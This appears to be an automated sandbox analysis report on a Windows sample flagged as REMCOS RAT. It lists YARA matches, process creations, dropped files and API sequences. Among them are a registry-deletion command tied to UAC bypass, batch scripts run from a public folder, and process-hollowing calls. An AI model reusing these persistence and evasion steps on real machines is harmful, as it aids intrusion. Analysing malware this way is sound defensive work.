Source: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 00000020.00000002.437522537.0000000010590000.00000040.00000001.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0000001C.00000002.417466186.0000000010590000.00000040.00000001.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Author: unknown

Source: ZfigYV6HXd.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI

Source: 28.2.mobsync.exe.740000.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 32.2.logagent.exe.10590000.2.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 32.2.logagent.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 28.2.mobsync.exe.740000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 28.2.mobsync.exe.10590000.2.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 28.2.mobsync.exe.10590000.2.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 14.2.logagent.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 32.2.logagent.exe.10590000.2.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 14.2.logagent.exe.105919bb.2.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 14.2.logagent.exe.10590000.1.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 32.2.logagent.exe.105919bb.1.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 32.2.logagent.exe.105919bb.1.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 32.2.logagent.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 28.2.mobsync.exe.105919bb.1.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 14.2.logagent.exe.105919bb.2.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 14.2.logagent.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 28.2.mobsync.exe.105919bb.1.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 14.2.logagent.exe.10590000.1.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0000000E.00000002.520767321.0000000010590000.00000040.00000001.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000020.00000002.436279698.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000020.00000002.437522537.0000000010590000.00000040.00000001.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0000001C.00000002.417466186.0000000010590000.00000040.00000001.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: C:\Users\Public\Libraries\mlzcjkK.url, type: DROPPED	Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019

Source: C:\Windows\SysWOW64\mobsync.exe

Code function: 28_2_00752BE1 ExitWindowsEx,LoadLibraryA,GetProcAddress,

28_2_00752BE1

Source: C:\Windows\SysWOW64\logagent.exe	Code function: 14_2_004340D5	14_2_004340D5
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 14_2_00423098	14_2_00423098
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 14_2_00411205	14_2_00411205
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 14_2_0043820B	14_2_0043820B
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 14_2_004223C0	14_2_004223C0
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 14_2_0044D3FA	14_2_0044D3FA
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 14_2_0043843A	14_2_0043843A
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 14_2_0043450A	14_2_0043450A
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 14_2_00419521	14_2_00419521
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 14_2_0044B5AB	14_2_0044B5AB
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 14_2_00431670	14_2_00431670
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 14_2_0042E6D5	14_2_0042E6D5
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 14_2_004516E0	14_2_004516E0
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 14_2_004337C1	14_2_004337C1
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 14_2_004228B7	14_2_004228B7
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 14_2_0043493F	14_2_0043493F
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 14_2_0043FA50	14_2_0043FA50
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 14_2_0041AAA0	14_2_0041AAA0
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 28_2_007740D5	28_2_007740D5
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 28_2_00763098	28_2_00763098
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 28_2_00751205	28_2_00751205
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 28_2_0077820B	28_2_0077820B
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 28_2_0078D3FA	28_2_0078D3FA
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 28_2_007623C0	28_2_007623C0
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 28_2_0077843A	28_2_0077843A
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 28_2_00759521	28_2_00759521
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 28_2_0077450A	28_2_0077450A
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 28_2_0078B5AB	28_2_0078B5AB
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 28_2_00771670	28_2_00771670
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 28_2_007916E0	28_2_007916E0
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 28_2_0076E6D5	28_2_0076E6D5
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 28_2_007737C1	28_2_007737C1
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 28_2_007628B7	28_2_007628B7
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 28_2_0077493F	28_2_0077493F
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 28_2_0077FA50	28_2_0077FA50
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 28_2_0075AAA0	28_2_0075AAA0
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 28_2_00770BBE	28_2_00770BBE
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 28_2_0078BCC9	28_2_0078BCC9
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 28_2_00773CBD	28_2_00773CBD
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 28_2_00762F55	28_2_00762F55
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 28_2_00777FDC	28_2_00777FDC

Source: C:\Windows\SysWOW64\logagent.exe	Code function: String function: 0042F49E appears 37 times
Source: C:\Windows\SysWOW64\logagent.exe	Code function: String function: 00402084 appears 66 times
Source: C:\Windows\SysWOW64\logagent.exe	Code function: String function: 0042FB60 appears 39 times
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: String function: 00742084 appears 79 times
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: String function: 0076FB60 appears 53 times
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: String function: 0076F49E appears 37 times

Source: C:\Windows\SysWOW64\logagent.exe

Code function: 14_2_0041412B CreateProcessW,CloseHandle,CloseHandle,CloseHandle,CloseHandle,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,TerminateProcess,SetThreadContext,ResumeThread,TerminateProcess,CloseHandle,CloseHandle,CloseHandle,

14_2_0041412B

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\reg.exe reg delete hkcu\Environment /v windir /f

Source: ZfigYV6HXd.exe	Virustotal: Detection: 31%
Source: ZfigYV6HXd.exe	ReversingLabs: Detection: 26%

Source: C:\Users\user\Desktop\ZfigYV6HXd.exe

File read: C:\Users\user\Desktop\ZfigYV6HXd.exe

Jump to behavior

Source: C:\Users\user\Desktop\ZfigYV6HXd.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\ZfigYV6HXd.exe 'C:\Users\user\Desktop\ZfigYV6HXd.exe'
Source: C:\Users\user\Desktop\ZfigYV6HXd.exe	Process created: C:\Windows\SysWOW64\logagent.exe C:\Windows\System32\logagent.exe
Source: C:\Users\user\Desktop\ZfigYV6HXd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\Public\Trast.bat' '
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /K C:\Users\Public\UKO.bat
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\Public\Libraries\Kkjczlm\Kkjczlm.exe 'C:\Users\Public\Libraries\Kkjczlm\Kkjczlm.exe'
Source: C:\Users\user\Desktop\ZfigYV6HXd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\Public\nest.bat' '
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg delete hkcu\Environment /v windir /f
Source: C:\Windows\SysWOW64\reg.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\Public\Libraries\Kkjczlm\Kkjczlm.exe 'C:\Users\Public\Libraries\Kkjczlm\Kkjczlm.exe'
Source: C:\Users\Public\Libraries\Kkjczlm\Kkjczlm.exe	Process created: C:\Windows\SysWOW64\mobsync.exe C:\Windows\System32\mobsync.exe
Source: C:\Users\Public\Libraries\Kkjczlm\Kkjczlm.exe	Process created: C:\Windows\SysWOW64\logagent.exe C:\Windows\System32\logagent.exe
Source: C:\Users\user\Desktop\ZfigYV6HXd.exe	Process created: C:\Windows\SysWOW64\logagent.exe C:\Windows\System32\logagent.exe	Jump to behavior
Source: C:\Users\user\Desktop\ZfigYV6HXd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\Public\Trast.bat' '	Jump to behavior
Source: C:\Users\user\Desktop\ZfigYV6HXd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\Public\nest.bat' '	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /K C:\Users\Public\UKO.bat	Jump to behavior
Source: C:\Users\Public\Libraries\Kkjczlm\Kkjczlm.exe	Process created: C:\Windows\SysWOW64\mobsync.exe C:\Windows\System32\mobsync.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg delete hkcu\Environment /v windir /f	Jump to behavior
Source: C:\Users\Public\Libraries\Kkjczlm\Kkjczlm.exe	Process created: C:\Windows\SysWOW64\logagent.exe C:\Windows\System32\logagent.exe	Jump to behavior

Source: C:\Users\user\Desktop\ZfigYV6HXd.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\logagent.exe	Code function: 14_2_00413958 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,		14_2_00413958
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 28_2_00753958 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,		28_2_00753958

Source: C:\Users\user\Desktop\ZfigYV6HXd.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\Kkjczlmayclzjlniqyuemyubilsdhtk[1]

Jump to behavior

Source: classification engine

Classification label: mal100.rans.troj.spyw.evad.winEXE@23/10@42/2

Source: C:\Users\user\Desktop\ZfigYV6HXd.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\Desktop\ZfigYV6HXd.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\Desktop\ZfigYV6HXd.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\Public\Libraries\Kkjczlm\Kkjczlm.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\Public\Libraries\Kkjczlm\Kkjczlm.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\Public\Libraries\Kkjczlm\Kkjczlm.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\Public\Libraries\Kkjczlm\Kkjczlm.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\Public\Libraries\Kkjczlm\Kkjczlm.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\Public\Libraries\Kkjczlm\Kkjczlm.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior

Source: C:\Windows\SysWOW64\logagent.exe

Code function: 14_2_004163AD OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,

14_2_004163AD

Source: C:\Windows\SysWOW64\logagent.exe

Code function: 14_2_0040D211 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,

14_2_0040D211

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6520:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6440:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6360:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6284:120:WilError_01
Source: C:\Windows\SysWOW64\logagent.exe	Mutant created: \Sessions\1\BaseNamedObjects\Octopus-GM39UT

Source: C:\Windows\SysWOW64\mobsync.exe

Code function: 28_2_00756C39 FindResourceA,LoadResource,LockResource,SizeofResource,

28_2_00756C39

Source: C:\Users\user\Desktop\ZfigYV6HXd.exe

Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\Public\Trast.bat' '

Source: C:\Users\user\Desktop\ZfigYV6HXd.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\ZfigYV6HXd.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\ZfigYV6HXd.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\logagent.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\logagent.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\Public\Libraries\Kkjczlm\Kkjczlm.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\Public\Libraries\Kkjczlm\Kkjczlm.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\Public\Libraries\Kkjczlm\Kkjczlm.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\Public\Libraries\Kkjczlm\Kkjczlm.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\Public\Libraries\Kkjczlm\Kkjczlm.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\Public\Libraries\Kkjczlm\Kkjczlm.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\ZfigYV6HXd.exe	Code function: 1_3_0339802C push eax; ret	1_3_03398068
Source: C:\Users\user\Desktop\ZfigYV6HXd.exe	Code function: 1_3_0339802C push eax; ret	1_3_03398068
Source: C:\Users\user\Desktop\ZfigYV6HXd.exe	Code function: 1_3_032F545C push eax; ret	1_3_032F5498
Source: C:\Users\user\Desktop\ZfigYV6HXd.exe	Code function: 1_3_0339802C push eax; ret	1_3_03398068
Source: C:\Users\user\Desktop\ZfigYV6HXd.exe	Code function: 1_3_0339802C push eax; ret	1_3_03398068
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 14_2_004510A8 push eax; ret	14_2_004510C6
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 14_2_00458445 push esi; ret	14_2_0045844E
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 14_2_00450786 push ecx; ret	14_2_00450799
Source: C:\Users\Public\Libraries\Kkjczlm\Kkjczlm.exe	Code function: 19_3_0339802C push eax; ret	19_3_03398068
Source: C:\Users\Public\Libraries\Kkjczlm\Kkjczlm.exe	Code function: 19_3_0339802C push eax; ret	19_3_03398068
Source: C:\Users\Public\Libraries\Kkjczlm\Kkjczlm.exe	Code function: 19_3_032F545C push eax; ret	19_3_032F5498
Source: C:\Users\Public\Libraries\Kkjczlm\Kkjczlm.exe	Code function: 19_3_0339802C push eax; ret	19_3_03398068
Source: C:\Users\Public\Libraries\Kkjczlm\Kkjczlm.exe	Code function: 19_3_0339802C push eax; ret	19_3_03398068
Source: C:\Users\Public\Libraries\Kkjczlm\Kkjczlm.exe	Code function: 25_3_03398036 push eax; ret	25_3_03398068
Source: C:\Users\Public\Libraries\Kkjczlm\Kkjczlm.exe	Code function: 25_3_0339802C push eax; ret	25_3_03398068
Source: C:\Users\Public\Libraries\Kkjczlm\Kkjczlm.exe	Code function: 25_3_0339802C push eax; ret	25_3_03398068
Source: C:\Users\Public\Libraries\Kkjczlm\Kkjczlm.exe	Code function: 25_3_0339802C push eax; ret	25_3_03398068
Source: C:\Users\Public\Libraries\Kkjczlm\Kkjczlm.exe	Code function: 25_3_0339802C push eax; ret	25_3_03398068
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 28_2_007910A8 push eax; ret	28_2_007910C6
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 28_2_00798445 push esi; ret	28_2_0079844E
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 28_2_00790786 push ecx; ret	28_2_00790799
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 28_2_0076FBA6 push ecx; ret	28_2_0076FBB9

Source: C:\Windows\SysWOW64\logagent.exe

Code function: 14_2_0040CD09 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,

14_2_0040CD09

Source: C:\Users\user\Desktop\ZfigYV6HXd.exe

File created: C:\Users\Public\Libraries\Kkjczlm\Kkjczlm.exe

Jump to dropped file

Source: C:\Windows\SysWOW64\mobsync.exe

